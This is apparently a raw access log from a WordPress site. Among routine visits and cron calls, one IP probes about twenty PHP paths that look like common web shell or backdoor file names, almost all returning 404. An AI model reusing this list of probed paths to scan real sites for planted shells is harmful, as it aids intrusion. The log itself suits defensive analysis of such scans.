118.24.135.34 - - [11/Jun/2026:08:57:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
118.24.135.34 - - [11/Jun/2026:08:57:16 +0800] "GET / HTTP/1.1" 200 35194 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Jun/2026:08:59:43 +0800] "POST /wp-cron.php?doing_wp_cron=1781139583.2764189243316650390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
138.59.5.183 - - [11/Jun/2026:08:59:43 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Python/3.11 aiohttp/3.9.5"
20.104.72.147 - - [11/Jun/2026:09:03:07 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:07 +0800] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:08 +0800] "GET /ff.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:08 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:08 +0800] "GET /tires.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:08 +0800] "GET /wp-block.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:09 +0800] "GET /wp-der.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:09 +0800] "GET /ah25.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:09 +0800] "GET /samll.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:09 +0800] "GET /wp-admin/css/colors/blue/file.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:10 +0800] "GET /favicon.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:10 +0800] "GET /aboutc.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [11/Jun/2026:09:03:11 +0800] "POST /wp-cron.php?doing_wp_cron=1781139791.4367389678955078125000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
20.104.72.147 - - [11/Jun/2026:09:03:11 +0800] "GET /wp-load.php HTTP/1.1" 200 5 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:11 +0800] "GET /aevly.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:12 +0800] "GET /atkno.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:12 +0800] "GET /mini.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:12 +0800] "GET /wp-thi.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:12 +0800] "GET /wp-kd4xalrg7m.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:13 +0800] "GET /amax.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:13 +0800] "GET /wehrman.php HTTP/1.1" 404 27 "-" "-"
20.104.72.147 - - [11/Jun/2026:09:03:13 +0800] "GET /b.php HTTP/1.1" 404 27 "-" "-"
